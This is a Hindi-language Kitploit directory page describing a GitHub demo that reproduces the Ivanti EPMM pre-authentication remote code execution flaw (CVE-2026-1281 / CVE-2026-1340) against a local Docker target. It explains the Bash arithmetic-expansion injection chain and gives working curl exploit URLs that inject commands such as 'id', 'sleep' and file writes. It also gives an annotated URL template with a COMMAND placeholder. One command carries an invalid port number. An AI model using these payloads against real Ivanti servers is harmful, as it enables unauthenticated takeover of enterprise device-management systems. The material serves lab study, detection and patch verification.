Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — एक सरल डेमो एप्लिकेशन जो दिखाता है कि शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए Ivanti EPMM प्री-ऑथ RCE भेद्यता (CVE-2026-1281 / CVE-2026-1340) को कैसे दोहराया जाए। | Kitploit
उपकरण/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

एक सरल डेमो एप्लिकेशन जो दिखाता है कि शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए Ivanti EPMM प्री-ऑथ RCE भेद्यता (CVE-2026-1281 / CVE-2026-1340) को कैसे दोहराया जाए।

रिपॉजिटरी देखें
36 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Ivanti EPMM प्री-ऑथ RCE डमी टारगेट

एक सरल डेमो एप्लिकेशन जो दिखाता है कि Ivanti EPMM प्री-ऑथ RCE भेद्यता (CVE-2026-1281 / CVE-2026-1340) को शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए कैसे पुन: उत्पन्न किया जाए।

भेद्यता अवलोकन

यह भेद्यता Bash अंकगणितीय विस्तार व्यवहार का शोषण करती है। जब किसी अन्य चर के संदर्भ वाले चर का उपयोग अंकगणितीय संदर्भ में किया जाता है, और उस संदर्भित चर में कमांड प्रतिस्थापन के साथ एक सरणी सूचकांक होता है, तो कमांड निष्पादित हो जाती है।

शोषण श्रृंखला

  1. अनुरोध में st=theValue (पैडिंग के साथ शाब्दिक स्ट्रिंग "theValue") होता है
  2. अनुरोध में h=gPath[\command`]` (सरणी सूचकांक में कमांड) होता है
  3. Bash स्क्रिप्ट लूप में key=value जोड़े पार्स करती है, प्रत्येक पुनरावृत्ति में theValue अपडेट करती है
  4. gStartTime शाब्दिक स्ट्रिंग "theValue" पर सेट होता है
  5. लूप के बाद, theValue में command`]` होता है
gPath[\
  • जब [[ ${currentTime} -gt ${gStartTime} ]] का मूल्यांकन होता है:
    • ${gStartTime} → "theValue" (स्ट्रिंग)
    • अंकगणितीय संदर्भ theValue को चर संदर्भ के रूप में मानता है
    • theValue → gPath[\command`]`
    • सरणी सूचकांक कमांड प्रतिस्थापन ट्रिगर करता है → RCE!
  • त्वरित प्रारंभ

    root@kitploit:~
    # कंटेनर बनाएं और प्रारंभ करें
    docker-compose up --build -d
    
    # जांचें कि यह चल रहा है
    curl http://localhost:8180/health
    

    भेद्यता का परीक्षण

    1. फ़ाइल निर्माण परीक्षण

    कमांड निष्पादन साबित करने के लिए एक फ़ाइल बनाएं:

    root@kitploit:~
    # URL-एन्कोडेड पेलोड: id > /mi/poc
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"
    
    # जांचें कि फ़ाइल बनाई गई थी
    cat artifacts/poc
    

    2. समय-आधारित परीक्षण

    स्लीप कमांड के साथ सत्यापित करें:

    root@kitploit:~
    # प्रतिक्रिया देने में ~5 सेकंड लगने चाहिए
    time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"
    

    3. कस्टम कमांड निष्पादन

    root@kitploit:~
    # कस्टम सामग्री लिखें
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"
    
    cat artifacts/pwned
    

    URL संरचना

    root@kitploit:~
    /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMAND%60%5D/uuid.ipa
                                   │      │              │              │
                                   │      │              │              └─ पेलोड: gPath[`COMMAND`]
                                   │      │              └─ समाप्ति टाइमस्टैम्प (कोई भी 10 अंक)
                                   │      └─ महत्वपूर्ण: शाब्दिक "theValue" + 2 स्थान (कुल 10 वर्ण)
                                   └─ कुंजी सूचकांक (कोई भी मान)
    

    डिबगिंग

    root@kitploit:~
    # कंटेनर लॉग देखें
    docker-compose logs -f
    
    # कंटेनर में शेल प्राप्त करें
    docker exec -it ivanti-epmm-vuln /bin/bash
    
    # nginx त्रुटि लॉग जांचें
    docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log
    

    सफाई

    root@kitploit:~
    docker-compose down
    rm -rf artifacts/*
    

    संदर्भ

    • WatchTowr Labs ब्लॉग पोस्ट

    अस्वीकरण

    यह केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। उन प्रणालियों के विरुद्ध उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास नहीं है।

    टूल डाउनलोड करें